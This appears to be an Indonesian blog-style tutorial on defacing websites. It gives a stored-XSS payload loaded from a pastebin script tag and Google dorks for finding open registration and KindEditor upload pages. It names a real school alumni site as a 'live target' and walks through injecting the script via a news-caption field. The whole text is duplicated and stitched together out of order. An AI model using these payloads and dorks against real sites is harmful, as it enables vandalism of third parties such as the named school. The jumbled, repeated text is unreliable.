Tutorial Deface POC Kindeditor

 

Assalamu'alaikum bro, balik sama gw Andika pratama, gimana kabar kalian semoga kabar kalian sehat walafiat, oke bro gw ada sedikit materi tentang depes Oke langung aja bro. 

Selanjutnya Tambahkan Kode Ini :

document.documentElement.innerHTML=String.fromCharCode(KODE)

Clic create new paste

Nah kemudian klik raw

Terus kamu salin link jsonya

Hasilnya:https://pastebin.com/raw/42pSJLhm

Selanjutnya tambahkan kode ini:

<script type="text/javascript" src="https://pastebin.com/raw/42pSJLhm></script>

Oke kita sudah buat script jsonya langsung saja kita ke tutorialnya gaskuen

Dork:

- inurl:/register/artikel

-inurl:/admin/member.php

-inurl:/member/register

-intext:remember me

-intitle:Login member

-inurl:/kontributor

Silahkan pilih web nya

                       *live target*

http://alumni.sman1lengayang.sch.id/kontributor

buka web di atas

2.scrool ke bawah.

3.kalian isi ajh ngasal juga gpapa.

4.Setelah itu kalian daftar.

5.Jika berhasil anda bakal masuk ke bagian konstributor/dashbord.

6.Selanjutnya kalian klik garis tiga di sebelah kiri atas.

7.Lalu kalian pilih modul berita.

8.Lalu akan muncul tulisan *tambahkan berita* Langsung kalian klik ajh.

Selanjutnya kalian isi ajh ngasal

*Judul : isi bebas saran gua isi nick kalian/tim kalian*

*Sub judul:apa ajh dah terserah *

*Video yt :kosongin ajh*

*Kategori: ngasal ajh gpapa*

Trus kalian klik *ya* semua

*Gambar: ga usah di isi*

*keterangan gambar : kalian isi make script jso yg tadi kalian buat *

Cara melihat hasil deface nya*

~Buka tab baru di google crome (note: tpi tab yg tadi buat deface jangan di apus dulu)

~selanjutnya kalian buat web yg kalian deface(misalnya web yg tadi gua jadiin live target)

Pada Kesempatan kali Ini saya Akan Memberikan Tutorial Cara Deface Metode

Kindeditor

SIAPIN BAHANNYA:

➢ Akses Internet

➢ Script HTML(buat sendiri jan bebanin hidup gw ya tq)

➢ Dork: inurl:examples/uploadbutton.html

Ok langsung saja

1. Kalian Dorking di google Cukup kalian salin terus tempel dork nya di pencarian

google

2. Kalau sudah kalian tinggal pilih website yang vuln/yang support di upload in

html/php,terus cari terus sampe nemu

disini kuncinya sabar ya. Pokoknya telusuri sampe bawah yng support mana

3

3. Nah gw udah ketemu ni yang support dan vuln mantap cukk langsung kita

tusbol ae

4. Selanjutnya klen cari icon Upload di pojok kiri atas pokknyaa..Nah langsung ae

klik

dah ketemu klik aja

kyk gini psti kalian BERHASIL ya/upload sukses

5. Nah klk udah di klik kalian cari ntuh script html klen yang mau di upload

6. Nah klk udah kalian klik nih yaa otomatis akan kyak gini nih tampilannya ..klk

kyk gini psti kalian BERHASIL ya/upload sukses

. Kalau udah Kayak gitu tinggal kalian SALIN tulisan nya

Pada Kesempatan kali Ini saya Akan Memberikan Tutorial Cara Deface Metode

Kindeditor

SIAPIN BAHANNYA:

➢ Akses Internet

➢ Script HTML(buat sendiri jan bebanin hidup gw ya tq)

➢ Dork: inurl:examples/uploadbutton.html

Ok langsung saja

1. Kalian Dorking di google Cukup kalian salin terus tempel dork nya di pencarian

google

2. Kalau sudah kalian tinggal pilih website yang vuln/yang support di upload in

html/php,terus cari terus sampe nemu

disini kuncinya sabar ya. Pokoknya telusuri sampe bawah yng support mana

3

3. Nah gw udah ketemu ni yang support dan vuln mantap cukk langsung kita

tusbol ae

4. Selanjutnya klen cari icon Upload di pojok kiri atas pokknyaa..Nah langsung ae

klik

dah ketemu klik aja

kyk gini psti kalian BERHASIL ya/upload sukses

5. Nah klk udah di klik kalian cari ntuh script html klen yang mau di upload

6. Nah klk udah kalian klik nih yaa otomatis akan kyak gini nih tampilannya ..klk

kyk gini psti kalian BERHASIL ya/upload sukses

. Kalau udah Kayak gitu tinggal kalian SALIN tulisan nya

Selanjutnya Tambahkan Kode Ini :

document.documentElement.innerHTML=String.fromCharCode(KODE)

Clic create new paste

Nah kemudian klik raw

Terus kamu salin link jsonya

Hasilnya:https://pastebin.com/raw/42pSJLhm

Selanjutnya tambahkan kode ini:

<script type="text/javascript" src="https://pastebin.com/raw/42pSJLhm></script>

Oke kita sudah buat script jsonya langsung saja kita ke tutorialnya gaskuen

Dork:

- inurl:/register/artikel

-inurl:/admin/member.php

-inurl:/member/register

-intext:remember me

-intitle:Login member

-inurl:/kontributor

Silahkan pilih web nya

                       *live target*

http://alumni.sman1lengayang.sch.id/kontributor

buka web di atas

2.scrool ke bawah.

3.kalian isi ajh ngasal juga gpapa.

4.Setelah itu kalian daftar.

5.Jika berhasil anda bakal masuk ke bagian konstributor/dashbord.

6.Selanjutnya kalian klik garis tiga di sebelah kiri atas.

7.Lalu kalian pilih modul berita.

8.Lalu akan muncul tulisan *tambahkan berita* Langsung kalian klik ajh.

Selanjutnya kalian isi ajh ngasal

*Judul : isi bebas saran gua isi nick kalian/tim kalian*

*Sub judul:apa ajh dah terserah *

*Video yt :kosongin ajh*

*Kategori: ngasal ajh gpapa*

Trus kalian klik *ya* semua

*Gambar: ga usah di isi*

*keterangan gambar : kalian isi make script jso yg tadi kalian buat *

Cara melihat hasil deface nya*

~Buka tab baru di google crome (note: tpi tab yg tadi buat deface jangan di apus dulu)

~selanjutnya kalian buat web yg kalian deface(misalnya web yg tadi gua jadiin live target)

Oke cukup segitu aja materi dari gw bro 

Assalamu'alaikum